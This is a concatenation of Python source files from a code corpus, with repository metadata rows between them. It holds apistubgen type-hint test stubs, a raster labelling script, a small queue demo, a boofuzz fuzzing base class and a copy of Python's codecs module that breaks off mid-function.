""" Adds the docstring, which exposes issues.
:keyword str string: String. Default value is "".
:keyword int int: Int. Default value is 0.
:keyword bool bool: Bool. Default value is False.
"""
pass
def with_optional_none_defaults(name: Optional[str] = None, *, age: Optional[int] = None) -> None:
pass
def with_class_default(my_class: Any = FakeObject) -> None:
pass
# pylint:disable=client-method-missing-type-annotations
def with_parsed_docstring_defaults(name, age, some_class):
""" Parsed docstring defaults.
:param name: Some dummy value, defaults
to "Bill". Extra text.
:type name: str
:param age: Something else, defaults
to 21. Extra text.
:type age: int
:param some_class: Some kind of class type, defaults to :py:class:`apistubgen.test.models.FakeObject`.
:type some_class: class
:rtype: None
"""
pass
def with_enum_defaults(enum1: Union[PetEnumPy3Metaclass, str] = "DOG", enum2: Union[PetEnumPy3Metaclass, str] = PetEnumPy3Metaclass.DOG) -> None:
pass
# pylint:disable=docstring-missing-return,docstring-missing-rtype
class Python3TypeHintClient:
def with_simple_typehints(self, name: str, age: int) -> str:
pass
def with_complex_typehints(self,
value: List[ItemPaged[Union[FakeObject, FakeError]]] # pylint: disable=line-too-long
) -> None:
pass
def with_variadic_typehint(self, *vars: str, **kwargs: "Any") -> None:
pass
def with_str_list_return_type(self) -> List[str]:
pass
def with_list_return_type(self) -> List["TestClass"]:
pass
def with_list_union_return_type(self) -> List[Union[str, int]]:
pass
def with_datetime_typehint(self, date: datetime) -> datetime:
pass
# pylint:disable=docstring-missing-return,docstring-missing-rtype
class Python2TypeHintClient:
def with_simple_typehints(
self,
name, # type: str
age # type: int
):
# type: (...) -> str
pass
def with_complex_typehints(self,
value # type: List[ItemPaged[Union[FakeObject, FakeError]]] # pylint: disable=line-too-long
):
# type: (...) -> None
pass
def with_variadic_typehint(
self,
*vars, # type: str
**kwargs # type: Any
):
# type: (*str, **Any) -> None
pass
def with_str_list_return_type(self):
# type: (...) -> List[str]
pass
def with_list_return_type(self):
# type: (...) -> List[TestClass]
pass
def with_list_union_return_type(self):
# type: (...) -> List[Union[str, int]]
pass
def with_datetime_typehint(
self,
date # type: datetime
):
# type: (...) -> datetime
pass
# pylint:disable=client-method-missing-type-annotations,docstring-missing-return,docstring-missing-rtype
class DocstringTypeHintClient:
def with_simple_typehints(self, name, age):
""" Simple typehints
:param str name: Name
:param int age: Age
:rtype: str
"""
pass
def with_complex_typehints(self, value):
""" Complex typehint
:param value: Value
:type value: List[ItemPaged[Union[FakeObject, FakeError]]]
:rtype: None
"""
pass
# pylint:disable=docstring-should-be-keyword
def with_variadic_typehint(self, *vars, **kwargs):
""" Variadic typehint
:param str vars: Args
:param Any kwargs: Kwargs
:rtype: None
"""
pass
def with_str_list_return_type(self):
"""" String list return
:rtype: List[str]
"""
pass
def with_list_return_type(self):
"""" String list return
:rtype: List[TestClass]
"""
pass
def with_list_union_return_type(self):
"""" List union return
:rtype: List[Union[str, int]]
"""
pass
def with_datetime_typehint(self, date):
""" With datetime
:param datetime date: Datetime
:rtype: datetime
"""
pass
class SpecialArgsClient:
def with_standard_names(self, *args, **kwargs) -> None:
pass
def with_nonstandard_names(self, *vars, **kwds) -> None:
pass
def with_no_args() -> None:
pass
def with_keyword_only_args(self, *, value, **kwargs) -> None:
pass
def with_positional_only_args(self, a, b, /, c) -> None:
pass
def with_sorted_kwargs(self, *, d, c, b, a, **kwargs) -> None:
pass
class PylintCheckerViolationsClient(PipelineClient):
def __init__(self, endpoint: str, connection_string: str):
self.endpoint = endpoint
self.connection_string = connection_string
def with_too_many_args(self, a: str, b: str, c: str, d: str, e:str , f: str, g: str, h: str, **kwargs: Any) -> None:
pass
def without_type_annotations(self, val) -> None:
pass
def without_return_annotation(self, val: str):
pass
| 27.139013 | 149 | 0.611038 |
795c735aea9c49fae36db7e6a77a5a9370b2d477 | 2,036 | py | Python | python/preprocess/monolabel.py | lewfish/cloud-buster | da31c4acea30bd97f68e1ff99dbbe11e0ba13db6 | [
"MIT"
] | null | null | null | python/preprocess/monolabel.py | lewfish/cloud-buster | da31c4acea30bd97f68e1ff99dbbe11e0ba13db6 | [
"MIT"
] | null | null | null | python/preprocess/monolabel.py | lewfish/cloud-buster | da31c4acea30bd97f68e1ff99dbbe11e0ba13db6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# The MIT License (MIT)
# =====================
#
# Copyright © 2020 Azavea
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the “Software”), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import argparse
import copy
import os
import numpy as np
import rasterio as rio
def cli_parser() -> argparse.ArgumentParser:
parser = argparse.ArgumentParser()
parser.add_argument('--input', required=True, type=str)
parser.add_argument('--output', required=True, type=str)
parser.add_argument('--n', required=True, type=int)
return parser
if __name__ == '__main__':
args = cli_parser().parse_args()
if 'CURL_CA_BUNDLE' not in os.environ:
os.environ['CURL_CA_BUNDLE'] = '/etc/ssl/certs/ca-certificates.crt'
with rio.open(args.input, 'r') as ds:
profile = copy.copy(ds.profile)
width = ds.width
height = ds.height
profile.update(count=1, dtype=np.uint8)
data = (np.ones((1, width, height)) * args.n).astype(np.uint8)
with rio.open(args.output, 'w', **profile) as ds:
ds.write(data)
| 33.933333 | 75 | 0.714145 |
795c74235f5653f951a426c106a5ff2c5b82af4b | 155 | py | Python | testproj/queue.py | musicwarez/testproj | 88a6f95f58849cca455865358cfd0bec8a4437a0 | [
"BSD-3-Clause"
] | null | null | null | testproj/queue.py | musicwarez/testproj | 88a6f95f58849cca455865358cfd0bec8a4437a0 | [
"BSD-3-Clause"
] | null | null | null | testproj/queue.py | musicwarez/testproj | 88a6f95f58849cca455865358cfd0bec8a4437a0 | [
"BSD-3-Clause"
] | null | null | null | from Queue import Queue
queue = Queue()
for i in range(0, 3):
queue.put(i)
print queue.get_nowait()
print queue.get_nowait()
print queue.get_nowait() | 17.222222 | 24 | 0.722581 |
795c7446f0a1ef1c7067c648fb57dbfd0db6c8dc | 668 | py | Python | boofuzz/boofuzz/primitives/base_primitive.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:01.000Z | 2021-06-04T14:27:15.000Z | boofuzz/boofuzz/primitives/base_primitive.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | null | null | null | boofuzz/boofuzz/primitives/base_primitive.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:09.000Z | 2021-06-04T14:27:21.000Z | from ..fuzzable import Fuzzable
class BasePrimitive(Fuzzable):
"""
The primitive base class implements common functionality shared across most primitives.
"""
def __init__(self, *args, **kwargs):
super(BasePrimitive, self).__init__(*args, **kwargs)
self._fuzz_library = [] # library of static fuzz heuristics to cycle through.
def mutations(self, default_value):
for val in self._fuzz_library:
yield val
def encode(self, value, mutation_context):
if value is None:
value = b""
return value
def num_mutations(self, default_value):
return len(self._fuzz_library)
| 27.833333 | 91 | 0.655689 |
795c756cb4bd956ad2058a28f320b0a12cc9ea3d | 37,798 | py | Python | sets/generator/withpattern/codecs.py | ignacio-gallego/tbcnn_skill_pill | 66c3939e2944160c864b61495ac4c7aaa56acd18 | [
"MIT"
] | 1 | 2022-03-26T15:43:50.000Z | 2022-03-26T15:43:50.000Z | sets/generator/withpattern/codecs.py | ignacio-gallego/tbcnn_skill_pill | 66c3939e2944160c864b61495ac4c7aaa56acd18 | [
"MIT"
] | null | null | null | sets/generator/withpattern/codecs.py | ignacio-gallego/tbcnn_skill_pill | 66c3939e2944160c864b61495ac4c7aaa56acd18 | [
"MIT"
] | 1 | 2022-03-28T19:28:45.000Z | 2022-03-28T19:28:45.000Z | """ codecs -- Python Codec Registry, API and helpers.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import builtins
import sys
### Registry and builtin stateless codec functions
try:
from _codecs import *
except ImportError as why:
raise SystemError('Failed to load the builtin codecs: %s' % why)
__all__ = ["register", "lookup", "open", "EncodedFile", "BOM", "BOM_BE",
"BOM_LE", "BOM32_BE", "BOM32_LE", "BOM64_BE", "BOM64_LE",
"BOM_UTF8", "BOM_UTF16", "BOM_UTF16_LE", "BOM_UTF16_BE",
"BOM_UTF32", "BOM_UTF32_LE", "BOM_UTF32_BE",
"CodecInfo", "Codec", "IncrementalEncoder", "IncrementalDecoder",
"StreamReader", "StreamWriter",
"StreamReaderWriter", "StreamRecoder",
"getencoder", "getdecoder", "getincrementalencoder",
"getincrementaldecoder", "getreader", "getwriter",
"encode", "decode", "iterencode", "iterdecode",
"strict_errors", "ignore_errors", "replace_errors",
"xmlcharrefreplace_errors",
"backslashreplace_errors", "namereplace_errors",
"register_error", "lookup_error"]
### Constants
#
# Byte Order Mark (BOM = ZERO WIDTH NO-BREAK SPACE = U+FEFF)
# and its possible byte string values
# for UTF8/UTF16/UTF32 output and little/big endian machines
#
# UTF-8
BOM_UTF8 = b'\xef\xbb\xbf'
# UTF-16, little endian
BOM_LE = BOM_UTF16_LE = b'\xff\xfe'
# UTF-16, big endian
BOM_BE = BOM_UTF16_BE = b'\xfe\xff'
# UTF-32, little endian
BOM_UTF32_LE = b'\xff\xfe\x00\x00'
# UTF-32, big endian
BOM_UTF32_BE = b'\x00\x00\xfe\xff'
if sys.byteorder == 'little':
# UTF-16, native endianness
BOM = BOM_UTF16 = BOM_UTF16_LE
# UTF-32, native endianness
BOM_UTF32 = BOM_UTF32_LE
else:
# UTF-16, native endianness
BOM = BOM_UTF16 = BOM_UTF16_BE
# UTF-32, native endianness
BOM_UTF32 = BOM_UTF32_BE
# Old broken names (don't use in new code)
BOM32_LE = BOM_UTF16_LE
BOM32_BE = BOM_UTF16_BE
BOM64_LE = BOM_UTF32_LE
BOM64_BE = BOM_UTF32_BE
### Codec base classes (defining the API)
class CodecInfo(tuple):
    """Codec details when looking up the codec registry"""

    # Private API to allow Python 3.4 to denylist the known non-Unicode
    # codecs in the standard library. A more general mechanism to
    # reliably distinguish test encodings from other codecs will hopefully
    # be defined for Python 3.5
    #
    # See http://bugs.python.org/issue19619
    _is_text_encoding = True  # Assume codecs are text encodings by default

    def __new__(cls, encode, decode, streamreader=None, streamwriter=None,
                incrementalencoder=None, incrementaldecoder=None, name=None,
                *, _is_text_encoding=None):
        # The tuple payload keeps the legacy 4-element lookup() API:
        # (encode, decode, streamreader, streamwriter).
        info = super().__new__(cls, (encode, decode, streamreader, streamwriter))
        info.name = name
        info.encode = encode
        info.decode = decode
        info.streamreader = streamreader
        info.streamwriter = streamwriter
        info.incrementalencoder = incrementalencoder
        info.incrementaldecoder = incrementaldecoder
        if _is_text_encoding is not None:
            # Only override the class default when explicitly requested.
            info._is_text_encoding = _is_text_encoding
        return info

    def __repr__(self):
        return "<{}.{} object for encoding {} at {:#x}>".format(
            self.__class__.__module__,
            self.__class__.__qualname__,
            self.name,
            id(self),
        )
class Codec:
    """Interface definition for stateless encoders/decoders.

    The .encode()/.decode() methods may select an error handling scheme
    through the errors argument. These string values are predefined:

     'strict' - raise a ValueError error (or a subclass)
     'ignore' - ignore the character and continue with the next
     'replace' - replace with a suitable replacement character;
                 Python will use the official U+FFFD REPLACEMENT
                 CHARACTER for the builtin Unicode codecs on
                 decoding and '?' on encoding.
     'surrogateescape' - replace with private code points U+DCnn.
     'xmlcharrefreplace' - Replace with the appropriate XML
                           character reference (only for encoding).
     'backslashreplace'  - Replace with backslashed escape sequences.
     'namereplace'       - Replace with \\N{...} escape sequences
                           (only for encoding).

    The set of allowed values can be extended via register_error.
    """

    def encode(self, input, errors='strict'):
        """Encode *input* and return an (output object, length consumed) tuple.

        errors selects the error handling scheme ('strict' by default).
        Implementations must not store state on the Codec instance (use
        StreamWriter for stateful encoding) and must accept zero length
        input, returning an empty object of the output type.
        """
        raise NotImplementedError

    def decode(self, input, errors='strict'):
        """Decode *input* and return an (output object, length consumed) tuple.

        input must be an object exposing the buffer interface, e.g.
        strings, buffer objects and memory mapped files.

        errors selects the error handling scheme ('strict' by default).
        Implementations must not store state on the Codec instance (use
        StreamReader for stateful decoding) and must accept zero length
        input, returning an empty object of the output type.
        """
        raise NotImplementedError
class IncrementalEncoder(object):
    """Encode an input in multiple steps.

    Input can be fed piece by piece to encode(); the encoder keeps the
    state of the encoding process between calls.
    """

    def __init__(self, errors='strict'):
        """Create an IncrementalEncoder instance.

        The errors keyword argument selects the error handling scheme;
        see the module docstring for the possible values.
        """
        self.errors = errors
        self.buffer = ""

    def encode(self, input, final=False):
        """Encode *input* and return the resulting object."""
        raise NotImplementedError

    def reset(self):
        """Reset the encoder to its initial state."""

    def getstate(self):
        """Return the current state of the encoder."""
        return 0

    def setstate(self, state):
        """Restore a state previously returned by getstate()."""
class BufferedIncrementalEncoder(IncrementalEncoder):
    """Base class for incremental encoders that must keep part of their
    input in a buffer between calls to encode()."""

    def __init__(self, errors='strict'):
        IncrementalEncoder.__init__(self, errors)
        # unencoded input carried over from the previous encode() call
        self.buffer = ""

    def _buffer_encode(self, input, errors, final):
        # Subclasses must implement this: encode *input* and return an
        # (output, length consumed) pair.
        raise NotImplementedError

    def encode(self, input, final=False):
        """Encode *input* together with any pending buffered input."""
        pending = self.buffer + input
        result, consumed = self._buffer_encode(pending, self.errors, final)
        # whatever was not consumed stays buffered for the next call
        self.buffer = pending[consumed:]
        return result

    def reset(self):
        IncrementalEncoder.reset(self)
        self.buffer = ""

    def getstate(self):
        return self.buffer if self.buffer else 0

    def setstate(self, state):
        self.buffer = state if state else ""
class IncrementalDecoder(object):
    """Decode an input in multiple steps.

    Input can be fed piece by piece to decode(); the decoder keeps the
    state of the decoding process between calls.
    """

    def __init__(self, errors='strict'):
        """Create an IncrementalDecoder instance.

        The errors keyword argument selects the error handling scheme;
        see the module docstring for the possible values.
        """
        self.errors = errors

    def decode(self, input, final=False):
        """Decode *input* and return the resulting object."""
        raise NotImplementedError

    def reset(self):
        """Reset the decoder to its initial state."""

    def getstate(self):
        """Return the current state of the decoder.

        This must be a (buffered_input, additional_state_info) tuple:
        buffered_input is a bytes object holding input passed to
        decode() that has not been converted yet; additional_state_info
        is a non-negative integer describing the decoder state WITHOUT
        the contents of buffered_input having been processed. In the
        initial state and after reset(), getstate() must return
        (b"", 0).
        """
        return (b"", 0)

    def setstate(self, state):
        """Restore a state previously returned by getstate().

        setstate((b"", 0)) must be equivalent to reset().
        """
class BufferedIncrementalDecoder(IncrementalDecoder):
    """Base class for incremental decoders that must be able to handle
    incomplete byte sequences spanning calls to decode()."""

    def __init__(self, errors='strict'):
        IncrementalDecoder.__init__(self, errors)
        # undecoded bytes carried over from the previous decode() call
        self.buffer = b""

    def _buffer_decode(self, input, errors, final):
        # Subclasses must implement this: decode *input* and return an
        # (output, length consumed) pair.
        raise NotImplementedError

    def decode(self, input, final=False):
        """Decode *input* together with any pending buffered bytes."""
        pending = self.buffer + input
        result, consumed = self._buffer_decode(pending, self.errors, final)
        # whatever was not consumed stays buffered for the next call
        self.buffer = pending[consumed:]
        return result

    def reset(self):
        IncrementalDecoder.reset(self)
        self.buffer = b""

    def getstate(self):
        # the additional state info is always 0 for buffered decoders
        return (self.buffer, 0)

    def setstate(self, state):
        # any additional state info in state[1] is ignored
        self.buffer = state[0]
#
# The StreamWriter and StreamReader class provide generic working
# interfaces which can be used to implement new encoding submodules
# very easily. See encodings/utf_8.py for an example on how this is
# done.
#
class StreamWriter(Codec):

    def __init__(self, stream, errors='strict'):
        """Create a StreamWriter wrapping *stream*.

        stream must be a file-like object open for writing.

        The errors keyword argument selects the error handling scheme.
        These values are predefined:

         'strict' - raise a ValueError (or a subclass)
         'ignore' - ignore the character and continue with the next
         'replace'- replace with a suitable replacement character
         'xmlcharrefreplace' - Replace with the appropriate XML
                               character reference.
         'backslashreplace'  - Replace with backslashed escape
                               sequences.
         'namereplace'       - Replace with \\N{...} escape sequences.

        The set of allowed values can be extended via register_error.
        """
        self.stream = stream
        self.errors = errors

    def write(self, object):
        """Encode *object* and write the result to the stream."""
        data, _consumed = self.encode(object, self.errors)
        self.stream.write(data)

    def writelines(self, list):
        """Join the given list of strings and write it via .write()."""
        self.write(''.join(list))

    def reset(self):
        """Reset the codec buffers used for keeping internal state.

        After this call the output data should be in a clean state
        allowing fresh data to be appended without rescanning the whole
        stream to recover state.
        """
        pass

    def seek(self, offset, whence=0):
        self.stream.seek(offset, whence)
        # An absolute seek to the start invalidates any pending state.
        if whence == 0 and offset == 0:
            self.reset()

    def __getattr__(self, name, getattr=getattr):
        """Delegate every other attribute to the underlying stream."""
        return getattr(self.stream, name)

    def __enter__(self):
        return self

    def __exit__(self, type, value, tb):
        self.stream.close()
###
class StreamReader(Codec):
    # Type used for the decoded-character buffer; subclasses may override.
    charbuffertype = str
    def __init__(self, stream, errors='strict'):
        """ Creates a StreamReader instance.
            stream must be a file-like object open for reading.
            The StreamReader may use different error handling
            schemes by providing the errors keyword argument. These
            parameters are predefined:
             'strict' - raise a ValueError (or a subclass)
             'ignore' - ignore the character and continue with the next
             'replace'- replace with a suitable replacement character
             'backslashreplace' - Replace with backslashed escape sequences;
            The set of allowed parameter values can be extended via
            register_error.
        """
        self.stream = stream
        self.errors = errors
        # raw bytes read from the stream but not yet decoded
        self.bytebuffer = b""
        # an empty instance of charbuffertype, reused for resets/joins
        self._empty_charbuffer = self.charbuffertype()
        # decoded data not yet handed out to the caller
        self.charbuffer = self._empty_charbuffer
        # cache of pre-split lines used by readline(); when set, read()
        # merges it back into charbuffer before doing anything else
        self.linebuffer = None
    def decode(self, input, errors='strict'):
        # Subclasses implement the actual stateless decode and return an
        # (output, length consumed) tuple.
        raise NotImplementedError
    def read(self, size=-1, chars=-1, firstline=False):
        """ Decodes data from the stream self.stream and returns the
            resulting object.
            chars indicates the number of decoded code points or bytes to
            return. read() will never return more data than requested,
            but it might return less, if there is not enough available.
            size indicates the approximate maximum number of decoded
            bytes or code points to read for decoding. The decoder
            can modify this setting as appropriate. The default value
            -1 indicates to read and decode as much as possible. size
            is intended to prevent having to decode huge files in one
            step.
            If firstline is true, and a UnicodeDecodeError happens
            after the first line terminator in the input only the first line
            will be returned, the rest of the input will be kept until the
            next call to read().
            The method should use a greedy read strategy, meaning that
            it should read as much data as is allowed within the
            definition of the encoding and the given size, e.g. if
            optional encoding endings or state markers are available
            on the stream, these should be read too.
        """
        # If we have lines cached, first merge them back into characters
        if self.linebuffer:
            self.charbuffer = self._empty_charbuffer.join(self.linebuffer)
            self.linebuffer = None
        if chars < 0:
            # For compatibility with other read() methods that take a
            # single argument
            chars = size
        # read until we get the required number of characters (if available)
        while True:
            # can the request be satisfied from the character buffer?
            if chars >= 0:
                if len(self.charbuffer) >= chars:
                    break
            # we need more data
            if size < 0:
                newdata = self.stream.read()
            else:
                newdata = self.stream.read(size)
            # decode bytes (those remaining from the last call included)
            data = self.bytebuffer + newdata
            if not data:
                break
            try:
                newchars, decodedbytes = self.decode(data, self.errors)
            except UnicodeDecodeError as exc:
                if firstline:
                    # Decode only up to the error position; if that span
                    # already contains a complete first line, return it
                    # and keep the problematic remainder buffered.
                    newchars, decodedbytes = \
                        self.decode(data[:exc.start], self.errors)
                    lines = newchars.splitlines(keepends=True)
                    if len(lines)<=1:
                        raise
                else:
                    raise
            # keep undecoded bytes until the next call
            self.bytebuffer = data[decodedbytes:]
            # put new characters in the character buffer
            self.charbuffer += newchars
            # there was no data available
            if not newdata:
                break
        if chars < 0:
            # Return everything we've got
            result = self.charbuffer
            self.charbuffer = self._empty_charbuffer
        else:
            # Return the first chars characters
            result = self.charbuffer[:chars]
            self.charbuffer = self.charbuffer[chars:]
        return result
    def readline(self, size=None, keepends=True):
        """ Read one line from the input stream and return the
            decoded data.
            size, if given, is passed as size argument to the
            read() method.
        """
        # If we have lines cached from an earlier read, return
        # them unconditionally
        if self.linebuffer:
            line = self.linebuffer[0]
            del self.linebuffer[0]
            if len(self.linebuffer) == 1:
                # revert to charbuffer mode; we might need more data
                # next time
                self.charbuffer = self.linebuffer[0]
                self.linebuffer = None
            if not keepends:
                line = line.splitlines(keepends=False)[0]
            return line
        readsize = size or 72
        line = self._empty_charbuffer
        # If size is given, we call read() only once
        while True:
            data = self.read(readsize, firstline=True)
            if data:
                # If we're at a "\r" read one extra character (which might
                # be a "\n") to get a proper line ending. If the stream is
                # temporarily exhausted we return the wrong line ending.
                if (isinstance(data, str) and data.endswith("\r")) or \
                   (isinstance(data, bytes) and data.endswith(b"\r")):
                    data += self.read(size=1, chars=1)
                line += data
                lines = line.splitlines(keepends=True)
                if lines:
                    if len(lines) > 1:
                        # More than one line result; the first line is a full line
                        # to return
                        line = lines[0]
                        del lines[0]
                        if len(lines) > 1:
                            # cache the remaining lines
                            lines[-1] += self.charbuffer
                            self.linebuffer = lines
                            self.charbuffer = None
                        else:
                            # only one remaining line, put it back into charbuffer
                            self.charbuffer = lines[0] + self.charbuffer
                        if not keepends:
                            line = line.splitlines(keepends=False)[0]
                        break
                    line0withend = lines[0]
                    line0withoutend = lines[0].splitlines(keepends=False)[0]
                    if line0withend != line0withoutend: # We really have a line end
                        # Put the rest back together and keep it until the next call
                        self.charbuffer = self._empty_charbuffer.join(lines[1:]) + \
                                          self.charbuffer
                        if keepends:
                            line = line0withend
                        else:
                            line = line0withoutend
                        break
            # we didn't get anything or this was our only try
            if not data or size is not None:
                if line and not keepends:
                    line = line.splitlines(keepends=False)[0]
                break
            # no complete line yet: grow the read size (capped growth)
            # and try again
            if readsize < 8000:
                readsize *= 2
        return line
    def readlines(self, sizehint=None, keepends=True):
        """ Read all lines available on the input stream
            and return them as a list.
            Line breaks are implemented using the codec's decoder
            method and are included in the list entries.
            sizehint, if given, is ignored since there is no efficient
            way to finding the true end-of-line.
        """
        data = self.read()
        return data.splitlines(keepends)
    def reset(self):
        """ Resets the codec buffers used for keeping internal state.
            Note that no stream repositioning should take place.
            This method is primarily intended to be able to recover
            from decoding errors.
        """
        self.bytebuffer = b""
        self.charbuffer = self._empty_charbuffer
        self.linebuffer = None
    def seek(self, offset, whence=0):
        """ Set the input stream's current position.
            Resets the codec buffers used for keeping state.
        """
        self.stream.seek(offset, whence)
        self.reset()
    def __next__(self):
        """ Return the next decoded line from the input stream."""
        line = self.readline()
        if line:
            return line
        raise StopIteration
    def __iter__(self):
        return self
    def __getattr__(self, name,
                    getattr=getattr):
        """ Inherit all other methods from the underlying stream.
        """
        return getattr(self.stream, name)
    def __enter__(self):
        return self
    def __exit__(self, type, value, tb):
        self.stream.close()
###
class StreamReaderWriter:
    """Wrap a single stream with both decoding reads and encoding writes.

    Reader and Writer factories (typically the ones returned by the
    codec.lookup() function) are instantiated over the same underlying
    stream, so the wrapper works in read and write mode alike.
    """
    # Optional attributes set by the file wrappers below
    encoding = 'unknown'

    def __init__(self, stream, Reader, Writer, errors='strict'):
        """Create the wrapper around *stream*.

        stream must be a Stream-like object.  Reader and Writer must be
        factory functions or classes providing the StreamReader resp.
        StreamWriter interface.  Error handling is done in the same way
        as defined for the StreamWriter/Readers.
        """
        self.stream = stream
        self.reader = Reader(stream, errors)
        self.writer = Writer(stream, errors)
        self.errors = errors

    def read(self, size=-1):
        """Delegate a decoding read to the reader."""
        return self.reader.read(size)

    def readline(self, size=None):
        """Delegate a decoding readline to the reader."""
        return self.reader.readline(size)

    def readlines(self, sizehint=None):
        """Delegate a decoding readlines to the reader."""
        return self.reader.readlines(sizehint)

    def __next__(self):
        """Return the next decoded line from the input stream."""
        return next(self.reader)

    def __iter__(self):
        return self

    def write(self, data):
        """Delegate an encoding write to the writer."""
        return self.writer.write(data)

    def writelines(self, list):
        """Delegate an encoding writelines to the writer."""
        return self.writer.writelines(list)

    def reset(self):
        """Reset both the reader's and the writer's codec buffers."""
        self.reader.reset()
        self.writer.reset()

    def seek(self, offset, whence=0):
        # The reader state always becomes stale after a seek; the writer
        # is only reset for an absolute seek to the stream start.
        self.stream.seek(offset, whence)
        self.reader.reset()
        if whence == 0 and offset == 0:
            self.writer.reset()

    def __getattr__(self, name, getattr=getattr):
        """Delegate every other attribute to the underlying stream."""
        return getattr(self.stream, name)

    # these are needed to make "with StreamReaderWriter(...)" work properly
    def __enter__(self):
        return self

    def __exit__(self, type, value, tb):
        self.stream.close()
###
class StreamRecoder:
    """Translate data transparently from one encoding to another.

    StreamRecoder instances use the complete set of APIs returned by
    the codecs.lookup() function to implement their task.

    Data written to the recoder is first decoded into an intermediate
    format (depending on the "decode" codec) and then written to the
    underlying stream via an instance of the provided Writer class.
    In the other direction, data is read from the underlying stream
    using a Reader instance and then encoded before being returned to
    the caller.
    """
    # Optional attributes set by the file wrappers below
    data_encoding = 'unknown'
    file_encoding = 'unknown'

    def __init__(self, stream, encode, decode, Reader, Writer,
                 errors='strict'):
        """Create a two-way transcoding wrapper around *stream*.

        encode and decode work on the frontend (the data visible to
        .read() and .write()) while Reader and Writer work on the
        backend (the data in stream).  They can be used to do
        transparent transcodings from e.g. latin-1 to utf-8 and back.

        stream must be a file-like object; encode/decode must adhere to
        the Codec interface; Reader/Writer must be factory functions or
        classes providing the StreamReader resp. StreamWriter
        interface.  Error handling is done in the same way as defined
        for the StreamWriter/Readers.
        """
        self.stream = stream
        self.encode = encode
        self.decode = decode
        self.reader = Reader(stream, errors)
        self.writer = Writer(stream, errors)
        self.errors = errors

    def read(self, size=-1):
        """Read via the backend reader, then re-encode the result."""
        decoded = self.reader.read(size)
        encoded, _ = self.encode(decoded, self.errors)
        return encoded

    def readline(self, size=None):
        """Read one line via the backend reader, then re-encode it."""
        if size is None:
            decoded = self.reader.readline()
        else:
            decoded = self.reader.readline(size)
        encoded, _ = self.encode(decoded, self.errors)
        return encoded

    def readlines(self, sizehint=None):
        """Read everything, re-encode it and split it into lines."""
        decoded = self.reader.read()
        encoded, _ = self.encode(decoded, self.errors)
        return encoded.splitlines(keepends=True)

    def __next__(self):
        """ Return the next decoded line from the input stream."""
        decoded = next(self.reader)
        encoded, _ = self.encode(decoded, self.errors)
        return encoded

    def __iter__(self):
        return self

    def write(self, data):
        """Decode *data* from the frontend encoding and write it."""
        decoded, _ = self.decode(data, self.errors)
        return self.writer.write(decoded)

    def writelines(self, list):
        """Concatenate, decode and write a sequence of byte strings."""
        decoded, _ = self.decode(b''.join(list), self.errors)
        return self.writer.write(decoded)

    def reset(self):
        """Reset both underlying codec buffers."""
        self.reader.reset()
        self.writer.reset()

    def seek(self, offset, whence=0):
        # Seeks must be propagated to both the readers and writers
        # as they might need to reset their internal buffers.
        self.reader.seek(offset, whence)
        self.writer.seek(offset, whence)

    def __getattr__(self, name, getattr=getattr):
        """Delegate every other attribute to the underlying stream."""
        return getattr(self.stream, name)

    def __enter__(self):
        return self

    def __exit__(self, type, value, tb):
        self.stream.close()
### Shortcuts
def open(filename, mode='r', encoding=None, errors='strict', buffering=-1):
    """Open an encoded file and return a transparently wrapping version.

    Note: The wrapped version will only accept the object format
    defined by the codecs, i.e. Unicode objects for most builtin
    codecs.  Output is also codec dependent and will usually be
    Unicode as well.  Underlying encoded files are always opened in
    binary mode; the default file mode is 'r' (read mode).

    encoding specifies the encoding which is to be used for the file.

    errors may be given to define the error handling.  It defaults to
    'strict' which causes ValueErrors to be raised in case an encoding
    error occurs.

    buffering has the same meaning as for the builtin open() API; the
    default -1 selects the default buffer size.

    The returned wrapped file object provides an extra attribute
    .encoding which allows querying the used encoding.  This attribute
    is only available if an encoding was specified as parameter.
    """
    if encoding is not None and 'b' not in mode:
        # The codec layer must see raw bytes, so force binary mode.
        mode = mode + 'b'
    stream = builtins.open(filename, mode, buffering)
    if encoding is None:
        return stream
    try:
        info = lookup(encoding)
        wrapper = StreamReaderWriter(stream, info.streamreader,
                                     info.streamwriter, errors)
        # Add attributes to simplify introspection
        wrapper.encoding = encoding
        return wrapper
    except:
        # Don't leak the file handle if codec lookup or wrapping fails.
        stream.close()
        raise
def EncodedFile(file, data_encoding, file_encoding=None, errors='strict'):
    """Return a wrapped version of *file* providing transparent
    encoding translation.

    Data written to the wrapped file is decoded according to the given
    data_encoding and then encoded to the underlying file using
    file_encoding.  Bytes read from the file are decoded using
    file_encoding and then passed back to the caller encoded using
    data_encoding.  The intermediate data type will usually be Unicode
    but depends on the specified codecs.

    If file_encoding is not given, it defaults to data_encoding.

    errors may be given to define the error handling.  It defaults to
    'strict' which causes ValueErrors to be raised in case an encoding
    error occurs.

    The returned wrapped file object provides two extra attributes
    .data_encoding and .file_encoding which reflect the given
    parameters of the same name and can be used for introspection by
    Python programs.
    """
    if file_encoding is None:
        file_encoding = data_encoding
    data_info = lookup(data_encoding)
    file_info = lookup(file_encoding)
    recoder = StreamRecoder(file, data_info.encode, data_info.decode,
                            file_info.streamreader, file_info.streamwriter,
                            errors)
    # Add attributes to simplify introspection
